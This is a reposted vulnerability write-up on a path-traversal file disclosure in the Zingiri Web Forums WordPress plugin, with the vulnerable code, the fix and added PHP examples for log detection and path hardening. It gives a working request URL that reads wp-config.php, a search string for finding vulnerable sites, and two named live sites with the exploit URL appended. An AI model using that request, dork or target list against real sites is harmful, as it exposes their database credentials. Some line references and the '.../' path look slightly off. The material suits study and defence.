WordPress Zingiri Forums arbitrary file disclosure (including the fix)

Source: Internet
Author: User
Tags wordpress blog

Refer:

WordPress Zingiri Forums arbitrary file disclosure
http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/

Secunia Advisory SA50833
http://secunia.com/advisories/50833/

 

Vulnerability analysis

The Zingiri Web Forums plugin for WordPress writes out a header for the forum in forum.php by adding an action to wp_head.

44 add_action('wp_head', 'zing_forum_header');

686 function zing_forum_header()
687 {
688     global $zing_forum_content;
689     global $zing_forum_menu;
690     $output = zing_forum_output("content");
691
692     zing_integrator_cut($output, '<div id="footer">', '</div>'); // remove footer
693     zing_integrator_cut($output, '<span class="forgot_password">', '</span>');
694
695     $zing_forum_content = $output;
696
697     echo '<script type="text/javascript" language="javascript">';
698     echo "var zing_forum_url = '" . ZING_FORUM_URL . "ajax/';";
699     echo "var zing_forum_index = '" . get_option('home') . "/index.php?';";
700     echo "function zing_forum_url_ajax(s) { return zing_forum_url + s; }";
701     echo '</script>';
702
703     echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen"/>';
704 }

So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes is into zing_forum_output, which is rather long. I've highlighted two areas:

456 function zing_forum_output($process) {
457     global $post, $wpdb, $zing_forum_loaded, $zing_forum_to_include, $zing_forum_mode;
458
459     $postVar = array();
460     switch ($process)
461     {
462         case "content":
463             if (isset($post)) $cf = get_post_custom($post->ID);
464             if (isset($_GET['zforum']))
465             {
466                 $zing_forum_to_include = $_GET['zforum'];   // attacker-controlled
467                 $zing_forum_mode = "forum";
468             }

We can affect the value of $zing_forum_to_include through the zforum GET variable. This is then used in a big elseif chain. Here is the block of code that is executed if we set it to css:

541 } elseif ($zing_forum_to_include == 'css') {
542     maid();
543     if (isset($_GET['stylesheet'])) $key = $_GET['stylesheet'];
544     else $key = $_GET['url'];
545     if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
546         $output = $_SESSION['ccforum']['stylesheet'][$key];
547     } else {
548         if (isset($_GET['stylesheet'])) {
549             $http = zing_forum_http("mybb", 'css.php', "");
550             $news = new zHttpRequest($http, 'zingsiri-forum');
551             if (!$news->curlInstalled()) return "cURL not installed";
552             elseif (!$news->live()) return "a http Error occured";
553             $output = $news->DownloadToString();
554             $output = str_replace('url(images/', 'url(' . ZING_MYBB_URL . '/images/', $output);
555
556         } elseif ($_GET['url']) {
557             $url = $_GET['url'];
558             $output = file_get_contents(ZING_MYBB_DIR . '/cache/themes/' . $url); // unsanitised path from the request
559         }
560         $f[] = '/^body.*{(.*?)/';
561         $r[] = '{$1';
562         $f[] = '/.zingbody/';
563         $r[] = '';
564         $f[] = '/(.*?) {(.*?)/';
565         $r[] = '.ccforum $1 {$2';
566         $f[] = '/(.*?), (.*?) {(.*?)/';
567         $r[] = '$1, .ccforum $2 {$3';
568         $f[] = '/(.*?), (.*?), (.*?) {(.*?)/';
569         $r[] = '$1, $2, .ccforum $3 {$4';
570         $output = preg_replace($f, $r, $output, -1, $count);
571         if ($output) $_SESSION['ccforum']['stylesheet'][$key] = $output;
572     }
573     header("Content-type: text/css");
574     echo $output;
575     die();

If we leave the "stylesheet" GET variable unset and set only the "url" GET variable, its value is fed straight into the file_get_contents call on line 554 (line 558 in the listing above). We can abuse this to disclose the contents of the wp-config.php file like this:

http://URL/wordpress/?zforum=css&url=.../wp-config.php

 

Google: inurl:plugins/zingsiri-forum

Affected sites found in the wild:
http://themakeupmorgue.com/?zforum=css&url=.../wp-config.php
http://www.4newdesign.com/?zforum=css&url=.../wp-config.php
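For site owners who want to know whether the css branch above was ever hit with a traversal value, the following is an added detection example (not from the write-up or the plugin). It parses Apache-style access-log lines, which are constructed here for the demo, and flags any request with zforum=css whose url parameter is not a bare .css file name.

```php
<?php
// Added example, not from the write-up: flag access-log requests that reach the
// zforum=css branch with a 'url' value that is not a plain .css file name.
// The log lines below are constructed for the demo (Apache combined-style format).
function zing_css_request_is_suspicious(string $logLine): bool
{
    // Pull the request target out of the quoted request line.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\//', $logLine, $m)) {
        return false;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;
    }
    parse_str($query, $params); // also percent-decodes, so ..%2F becomes ../
    if (($params['zforum'] ?? '') !== 'css' || !isset($params['url'])) {
        return false;
    }
    // Anything other than a bare file name (slashes, parent references, arrays) is suspicious.
    return !is_string($params['url'])
        || !preg_match('/^[A-Za-z0-9_-]+\.css$/', $params['url']);
}

$lines = [
    '203.0.113.5 - - [12/Jan/2013:10:00:01 +0000] "GET /?zforum=css&url=default.css HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Jan/2013:10:00:02 +0000] "GET /?zforum=css&url=../../wp-config.php HTTP/1.1" 200 2048',
    '203.0.113.9 - - [12/Jan/2013:10:00:03 +0000] "GET /?zforum=css&url=..%2F..%2Fwp-config.php HTTP/1.1" 200 2048',
    '198.51.100.2 - - [12/Jan/2013:10:00:04 +0000] "GET /index.php?zforum=forum HTTP/1.1" 200 9000',
];
foreach ($lines as $line) {
    echo (zing_css_request_is_suspicious($line) ? 'ALERT ' : 'ok    ') . $line . "\n";
}
```

A 200 status on a flagged line means the file was actually returned, which is the case to treat as a credential exposure.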

Solution:

Comparing version 1.4.4 with version 1.4.2:
557 $url = $_GET['url'];
becomes
555 $url = str_replace('..', '', $_GET['url']);

".." is stripped from the parameter so the path can no longer climb into a parent directory.

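The 1.4.4 fix relies on stripping a string pattern rather than on checking where the final path actually ends up. The following is an added example (not the plugin's code) that puts the 1.4.2 construction, the 1.4.4 mitigation and a containment check on the resolved path side by side; it creates a scratch directory to stand in for ZING_MYBB_DIR so it runs stand-alone.

```php
<?php
// Added example (not the plugin's code): the path construction from the
// vulnerable branch, the 1.4.4 str_replace mitigation, and a containment
// check on the resolved path. ZING_MYBB_DIR points at a scratch directory
// created here so the script runs stand-alone.
define('ZING_MYBB_DIR', sys_get_temp_dir() . '/zing_demo_' . getmypid());
$themes = ZING_MYBB_DIR . '/cache/themes';
mkdir($themes, 0700, true);
file_put_contents($themes . '/default.css', "body { color: #000; }\n");
file_put_contents(ZING_MYBB_DIR . '/wp-config.php', "<?php // constructed stand-in for the real config\n");

// 1.4.2: the 'url' parameter is appended to the themes directory unchanged.
function theme_path_vulnerable(string $url): string
{
    return ZING_MYBB_DIR . '/cache/themes/' . $url;
}

// 1.4.4: '..' is stripped first; whatever survives the stripping still reaches the filesystem.
function theme_path_144(string $url): string
{
    return ZING_MYBB_DIR . '/cache/themes/' . str_replace('..', '', $url);
}

// Hardened: accept only a bare *.css file name, resolve it (realpath also follows
// symlinks), and require the result to stay inside the themes directory; else null.
function theme_path_hardened(string $url): ?string
{
    $base = realpath(ZING_MYBB_DIR . '/cache/themes');
    if ($base === false || !preg_match('/^[A-Za-z0-9_-]+\.css$/', $url)) {
        return null;
    }
    $real = realpath($base . '/' . $url);
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

foreach (['default.css', '../../wp-config.php', 'nosuch.css'] as $in) {
    printf("%-22s vulnerable:%-4s 1.4.4:%-4s hardened:%s\n", $in,
        is_file(theme_path_vulnerable($in)) ? 'read' : 'no',
        is_file(theme_path_144($in)) ? 'read' : 'no',
        theme_path_hardened($in) === null ? 'rejected' : 'read');
}

// Remove the scratch files.
unlink($themes . '/default.css');
unlink(ZING_MYBB_DIR . '/wp-config.php');
rmdir($themes); rmdir(ZING_MYBB_DIR . '/cache'); rmdir(ZING_MYBB_DIR);
```

Only the first input is served by the hardened variant; the traversal input reaches wp-config.php in the 1.4.2 construction, and the 1.4.4 version blocks it by string stripping alone.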